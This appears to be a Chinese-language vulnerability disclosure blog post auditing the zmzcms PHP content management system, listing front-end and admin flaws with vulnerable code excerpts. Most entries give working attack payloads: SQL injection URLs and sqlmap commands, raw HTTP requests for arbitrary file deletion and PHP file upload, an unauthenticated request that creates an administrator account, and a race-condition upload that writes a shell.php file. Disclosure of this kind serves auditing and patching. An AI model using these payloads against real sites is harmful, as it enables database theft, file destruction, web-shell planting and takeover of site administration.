前台
sql注入1
url
http://zmzcms/cms/cms/include/make.php?php=1&art=1
漏洞代码
if(isset($_GET['php']) && isset($_GET['art'])){
$tid=$c_sql->select("select tid from art where id=".$_GET['art']);
$type_dq=$c_sql->select("select id,tid,lanmumoban,lanmumingcheng,xiangqingmoban,baocunlujing,shujumoxing from type where id=".$tid[0]['tid']);
$_GET['art_p']=2;
}
cms/cms/include/make.php第157行,未对$_GET进行验证,导致过滤
测试
sqlmap
python sqlmap.py -u "http://zmzcms/cms/cms/include/make.php?php=1&art=1" -p art --dbms mysql --batch -v 3
sql注入2
url
http://zmzcms/cms/cms/include/make.php?list=1
漏洞代码
$type_dq=$c_sql->select("select id,tid,lanmumoban,lanmumingcheng,xiangqingmoban,baocunlujing,shujumoxing from type where id=".$_GET['list']);cms/cms/include/make.php第162行,未对$_GET进行验证,导致过滤
测试
payload
http://zmzcms/cms/cms/include/make.php?list=1%20and%20sleep(5)
sql注入3
url
http://zmzcms/cms/cms/include/zidong.php?tid=1&laiyuan=0&sou=1&id=1&wid=1
漏洞代码
$kucuns=$c_sql->select("select id from art where (tid=$tid and fabushijian=1) order by id asc limit 1");cms/cms/include/zidong.php第21行,未对传入参数进行校验
sqlmap测试
payload
python sqlmap.py -u "http://zmzcms/cms/cms/include/zidong.php?tid=1&laiyuan=0&sou=1&id=1&wid=1" -p tid --dbms mysql --batch -v 3
sql注入4
url
http://zmzcms/cms/common/php/ajax.php
漏洞代码
if($run=='ad' && $_GET['id']){
$ads=$c_sql->select("select * from youad where id=".$_GET['id']);
未对传入参数校验
payload
?run=ad&id=1%20union%20select%201,2,3,4,5,6,7,8,9
sql注入5
url
http://zmzcms/cms/common/php/ajax.php
漏洞代码
if($run=='dj' && $_GET['id']){
$dianjis=$c_sql->select("select dianji from art where id=".$_GET['id']);
$dianji=$dianjis[0]['dianji'];
if($dianji==NULL or $dianji==''){
echo "document.write('0');";
}
else{
echo "document.write('{$dianji}');";
}
$post=array('dianji'=>$dianji*1+1);
$c_sql->update('art',$post,'id='.$_GET['id']);
}
payload
?run=dj&id=0%20union%20select%20database()
任意文件删除1
url
http://zmzcms/cms/cms/include/up.php
漏洞代码
if($run=='del'){
$url=$_POST['url'];
if(!unlink($url)){
echo 0;
}
else{
echo 1;
}
}
cms/cms/include/up.php第38行,未对参数进行校验过滤,导致任意文件删除
payload
POST /cms/cms/include/up.php?run=del HTTP/1.1
Host: zmzcms
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7ar2cdd28f6ar0vutn8tcdi19p
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
url=dis.txt
任意文件删除2
url
http://zmzcms/cms/cms/include/upload.php
漏洞代码
else if(isset($_GET['del'])){
$src=$_GET['del'];
if(!unlink($src)){
echo 0;
}
else{
echo 1;
}
exit;
}
cms/cms/include/upload.php第31行,未对参数过滤
payload
GET /cms/cms/include/upload.php?del=dis.txt HTTP/1.1
Host: zmzcms
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7ar2cdd28f6ar0vutn8tcdi19p
Connection: close
任意文件上传1
url
http://zmzcms/cms/cms/include/up.php
漏洞代码
if($run=='file'){
$res=array();
$path=$_GET['path'];//上传的路径
$filename=$_GET['filename'];//1不更改,0更改
is_dir($path) OR mkdir($path, 0777, true);//文件夹不存在创建文件夹
foreach($_FILES as $k=>$arr){
$path=$_GET['path'];//上传的路径
$name=$arr['name'];//文件名
$type=$arr['type'];//文件类型
$tmp_name=$arr['tmp_name'];//临时文件
$size=$arr['size'];//文件大小
/*目标地址*/
if($filename==1){
$path.=$name;
}
else{
$path.=time().$k.hz($name);
}
/*上传*/
if(move_uploaded_file($tmp_name,$path)){
$res[]=$path;
}
}
echo json_encode($res);
}
cms/cms/include/up.php第9行,没有对上传的文件类型进行判断过滤,目录可控,导致任意文件上传
exp
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<form action="up.php?run=file" method="post" enctype="multipart/form-data">
<input type="file"name="file">
<input type="submit" name="sub">
</form>
</body>
</html>
payload
POST /cms/cms/include/up.php?run=file&path=dis/&filename=1 HTTP/1.1
Host: zmzcms
Content-Length: 295
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://zmzcms
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaxev9vCxCztS1EtB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://zmzcms/cms/cms/include/upload.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7ar2cdd28f6ar0vutn8tcdi19p
Connection: close
------WebKitFormBoundaryaxev9vCxCztS1EtB
Content-Disposition: form-data; name="file"; filename="info.php"
Content-Type: image/png
<?php phpinfo();?>
------WebKitFormBoundaryaxev9vCxCztS1EtB
Content-Disposition: form-data; name="sub"
提交
------WebKitFormBoundaryaxev9vCxCztS1EtB--
任意文件上传2
url
http://zmzcms/cms/cms/include/upload.php
漏洞代码
if(isset($_FILES) && isset($_GET['path']) && isset($_GET['name']) && isset($_GET['id'])){
$path = $_GET['path'];//文件上传根目录
$name = $_GET['name'];//文件命名规则
$id = $_GET['id'];//上传插件的id
if (!file_exists($path)) {mkdir($path, 0777, true);}//上传目录不存在则创建
$res='';//返回的参数
$i=1;//递增的文件名
foreach($_FILES as $arr){
//文件名S
if($name==1){$file_name=$arr['name'];}
else{
if($arr['type']=='image/png'){$file_name=time().$i.'.png';}
if($arr['type']=='image/jpeg'){$file_name=time().$i.'.jpg';}
if($arr['type']=='image/gif'){$file_name=time().$i.'.gif';}
}
//文件名E
$tmp_name=$arr['tmp_name'];//临时文件
$url=$path.$file_name;//新文件路径
if(move_uploaded_file($tmp_name,$url)){
$res.="<img id='$id{$i}00' onclick=\"del('$id{$i}00','{$id}')\" src='{$url}' />";
}
$i++;
}
echo $res;
}
cms/cms/include/upload.php第4行,未对上传文件进行校验,导致任意文件上传
payload
POST /cms/cms/include/upload.php?id=1&name=1&path=dis/ HTTP/1.1
Host: zmzcms
Content-Length: 295
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://zmzcms
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWBkijjnZbLewO7bq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://zmzcms/cms/cms/include/upload.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7ar2cdd28f6ar0vutn8tcdi19p
Connection: close
------WebKitFormBoundaryWBkijjnZbLewO7bq
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png
<?php phpinfo();?>�
------WebKitFormBoundaryWBkijjnZbLewO7bq
Content-Disposition: form-data; name="sub"
提交
------WebKitFormBoundaryWBkijjnZbLewO7bq--
任意文件上传3
url
http://zmzcms/cms/cms/zbzedit/php/zbz.php
漏洞代码
if($run=='uptxt'){
$res=array();
foreach($_FILES as $i=> $arr){
$tmp_name=$arr['tmp_name'];//临时文件
if($data_pic_name==0){
//后缀
$houzhuis=explode('.',$arr['name']);
$houzhui=$houzhuis[count($houzhuis)-1];
$pathurl=$path.time().'_'.$i.'.'.$houzhui;
}
else{
$pathurl=$path.$arr['name'];
}
is_dir($path) OR mkdir($path, 0777, true);//文件夹不存在创建文件夹
$pathurl=iconv("UTF-8","gb2312",$pathurl);//目标路径
if(move_uploaded_file($tmp_name,$pathurl)){
$res[]=str_ireplace($path,$path_res,$pathurl);
}
}
echo json_encode($res);//返回json
}
未对上传内容进行校验,文件名以及文件路径可控,导致任意文件上传
payload
POST /cms/cms/zbzedit/php/zbz.php?run=uptxt&path=./&path_res=./&data_pic_name=1 HTTP/1.1
Host: zmzcms
Content-Length: 301
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://zmzcms
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWf35LJsGAYQOBrbm
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://zmzcms/cms/cms/include/upload.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryWf35LJsGAYQOBrbm
Content-Disposition: form-data; name="file"; filename="phpinfo.php"
Content-Type: image/png
<?php
phpinfo();
?>
------WebKitFormBoundaryWf35LJsGAYQOBrbm
Content-Disposition: form-data; name="sub"
提交
------WebKitFormBoundaryWf35LJsGAYQOBrbm--
后台
任意文件删除1
url
http://zmzcms/cms/cms/admin/run_ajax.php?run=delpath
漏洞代码
if($run=='delpath'){
$path=$_POST['path'];
delDirAndFile($path, $delDir = true);
}
cms/cms/admin/run_ajax.php第472行
调用cms/cms/include/function.php的delDirAndFile函数,未进行严格参数判断
payload
path=./dis.txt
未授权任意用户添加
url
http://zmzcms/cms/cms/admin/ajax.php
漏洞代码
if($run=='addedit'){
$table=$_GET['table'];
$where="id=".$_POST['id'];
$cha=$c_sql->select("select id from $table where $where");
if(isset($cha[0]['id'])){
$res=$c_sql->update($table,$_POST,$where);
}
else{
$res=$c_sql->insert($table,$_POST);
}
echo $res;
}
该接口未进行身份校验,导致任意用户均可访问
payload
POST /cms/cms/admin/ajax.php?run=addedit&table=admin HTTP/1.1
Host: zmzcms
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=90f74tlr9d3nu0i4rpf8fiuas9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
id=3&guanliyuan=hack&mima=123456&dengji=1
任意用户删除
url
http://zmzcms/cms/cms/admin/ajax.php
漏洞代码
if($run=='del'){
$table=$_GET['table'];
$where="id=".$_POST['id'];
echo $c_sql->delete($table,$where);
}
payload
POST /cms/cms/admin/ajax.php?run=del&table=admin HTTP/1.1
Host: zmzcms
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=90f74tlr9d3nu0i4rpf8fiuas9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
id=3
任意文件上传1
url
http://zmzcms/cms/cms/admin/ajax.php?run=youad_pic
漏洞代码
if($run=='youad_pic'){
$path='../../upload/';
$path_res='../../upload/';
$res='';
foreach($_FILES as $i=> $arr){
$tmp_name=$arr['tmp_name'];//临时文件
if($data_pic_name==0){
//后缀
$houzhuis=explode('.',$arr['name']);
$houzhui=$houzhuis[count($houzhuis)-1];
$pathurl=$path.time().'_'.$i.'.'.$houzhui;
}
else{
$pathurl=$path.$arr['name'];
}
is_dir($path) OR mkdir($path, 0777, true);//文件夹不存在创建文件夹
$pathurl=iconv("UTF-8","gb2312",$pathurl);//目标路径
if(move_uploaded_file($tmp_name,$pathurl)){
$pathurl_res=str_ireplace($path,$path_res,$pathurl);
$res.=$pathurl_res;
}
}
echo $res;
}
未对文件类型进行限制及过滤,且会回显上传目录及名称
payload
POST /cms/cms/admin/ajax.php?run=youad_pic HTTP/1.1
Host: zmzcms
Content-Length: 316
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://zmzcms
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylJFmXDLPtOy4KJMq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://zmzcms/cms/cms/admin/upload.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=90f74tlr9d3nu0i4rpf8fiuas9
Connection: close
------WebKitFormBoundarylJFmXDLPtOy4KJMq
Content-Disposition: form-data; name="file"; filename="phpinfo.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
------WebKitFormBoundarylJFmXDLPtOy4KJMq
Content-Disposition: form-data; name="sub"
提交
------WebKitFormBoundarylJFmXDLPtOy4KJMq--
任意文件上传2
url
http://zmzcms/cms/cms/admin/run_ajax.php?run=youad_pic
漏洞代码
if($run=='youad_pic'){
$path='../../upload/';
$path_res='../../upload/';
$res='';
foreach($_FILES as $i=> $arr){
$tmp_name=$arr['tmp_name'];//临时文件
if($data_pic_name==0){
//后缀
$houzhuis=explode('.',$arr['name']);
$houzhui=$houzhuis[count($houzhuis)-1];
$pathurl=$path.time().'_'.$i.'.'.$houzhui;
}
else{
$pathurl=$path.$arr['name'];
}
is_dir($path) OR mkdir($path, 0777, true);//文件夹不存在创建文件夹
$pathurl=iconv("UTF-8","gb2312",$pathurl);//目标路径
if(move_uploaded_file($tmp_name,$pathurl)){
$pathurl_res=str_ireplace($path,$path_res,$pathurl);
$res.=$pathurl_res;
}
}
echo $res;
}
payload
POST /cms/cms/admin/run_ajax.php?run=youad_pic HTTP/1.1
Host: zmzcms
Content-Length: 316
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://zmzcms
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIid37DLDfg7ZmxLv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://zmzcms/cms/cms/admin/upload.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=90f74tlr9d3nu0i4rpf8fiuas9
Connection: close
------WebKitFormBoundaryIid37DLDfg7ZmxLv
Content-Disposition: form-data; name="file"; filename="phpinfo.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
------WebKitFormBoundaryIid37DLDfg7ZmxLv
Content-Disposition: form-data; name="sub"
提交
------WebKitFormBoundaryIid37DLDfg7ZmxLv--
条件竞争文件上传
url
http://zmzcms/cms/cms/admin/run_ajax.php?run=uptxt&id=1&chatu=1&fabushijian=1
漏洞代码
if($run=='uptxt'){
$id=$_GET['id'];
$chatu=$_GET['chatu'];
$fabushijian=$_GET['fabushijian'];
foreach($_FILES as $k=>$arr){
$tmp_name=$arr['tmp_name'];//临时文件
$path='uptxt';
is_dir($path) OR mkdir($path, 0777, true);//文件夹不存在创建文件夹
$pathurl=$path.'/'.$arr['name'];
$pathurl=utf8($pathurl);
if($arr['error']==0){
// echo 1;
if(!move_uploaded_file($tmp_name,iconv("UTF-8","gb2312",$pathurl))){
move_uploaded_file($tmp_name,$pathurl);
}
$gml='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"];//当前文件夹
$gml=dirname($gml);
$neirong=file_get_contents($gml.'/'.$pathurl);
$neirong=utf8($neirong);
$neirong='<p>'.str_ireplace("\r\n","</p><p>",$neirong).'</p>';
if($chatu==1){
$tuku=ii('tuku');//图库
$tukus=explode(";",$tuku);
$tupians=array();
$suoluetu='';
$tupianshu=rand(1,3);
for ($x=1; $x<=$tupianshu; $x++) {
$k=rand(0,count($tukus)-1);
if($x==1){
$suoluetu=$tukus[$k];
}
$tupians[]="\r\n<p style='text-align:center'><img alt='{$key}' src='".$tukus[$k]."' /></p>";
unset($tukus[$k]);
$tukus = array_values($tukus);
}
$neirongs=explode('</p>',$neirong);
if(count($tupians)>0){
foreach($tupians as $k=>$v){
$neirongs[$k]=$neirongs[$k].$v;
}
}
$neirong=implode('',$neirongs);
}
$art['tid']=$id;
$art['biaoti']=str_ireplace('.txt','',$arr['name']);
$art['neirong']=$neirong;
$art['zhaiyao']=jiequ($neirong,100);//截取摘要
$art['suoluetu']=$suoluetu;
$art['paixu']=50;
$art['fabudao']=0;
$art['zuozhe']=$_SESSION['guanliyuan'];
if($fabushijian==0){
$art['fabushijian']=1;
}
else{
$art['fabushijian']=time();
}
$c_sql->insert('art',$art);
}
}
echo $pathurl;
delDirAndFile($path,1);
}
虽然会删除文件,但可以进行条件竞争创建
payload1
POST /cms/cms/admin/run_ajax.php?run=uptxt&id=1&chatu=1&fabushijian=1 HTTP/1.1
Host: zmzcms
Content-Length: 387
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://zmzcms
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryB38Jwu72QYRLAHwS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.3§6§
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://zmzcms/cms/cms/admin/upload.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=90f74tlr9d3nu0i4rpf8fiuas9
Connection: close
------WebKitFormBoundaryB38Jwu72QYRLAHwS
Content-Disposition: form-data; name="file"; filename="info.php"
Content-Type: application/octet-stream
<?php
phpinfo();
$data = "<?php phpinfo(); ?>";
file_put_contents("../shell.php", $data);
?>
------WebKitFormBoundaryB38Jwu72QYRLAHwS
Content-Disposition: form-data; name="sub"
敕交
------WebKitFormBoundaryB38Jwu72QYRLAHwS--
payload2
GET /cms/cms/admin/uptxt/info.php HTTP/1.1
Host: zmzcms
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.3§6§
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=90f74tlr9d3nu0i4rpf8fiuas9
Connection: close
payload1进行无限上传,payload2连续请求
sql注入1
url
http://zmzcms/cms/cms/admin/art.php
漏洞代码
$types=$c_sql->select("select lanmumingcheng,shujumoxing from type where id=$tid limit 1");payload
http://zmzcms/cms/cms/admin/art.php?tid=0%20union%20select%20database(),2--+
sql注入2
url
http://zmzcms/cms/cms/admin/run_ajax.php?run=type_run
漏洞代码
if($run=='type_run'){
$post['run']=$_POST['run'];
echo $c_sql->update('type',$post,"id=".$_POST['id']);
}
sqlmap测试
python sqlmap.py -r 1.txt
sql注入3
url
http://zmzcms/cms/cms/admin/type.php
漏洞代码
$types=$c_sql->select("select * from type where id={$id}");payload
?id=0%20union%20select%201,2,database(),version(),5,6,7,user(),9,10,11,2,13,14,15
网友评论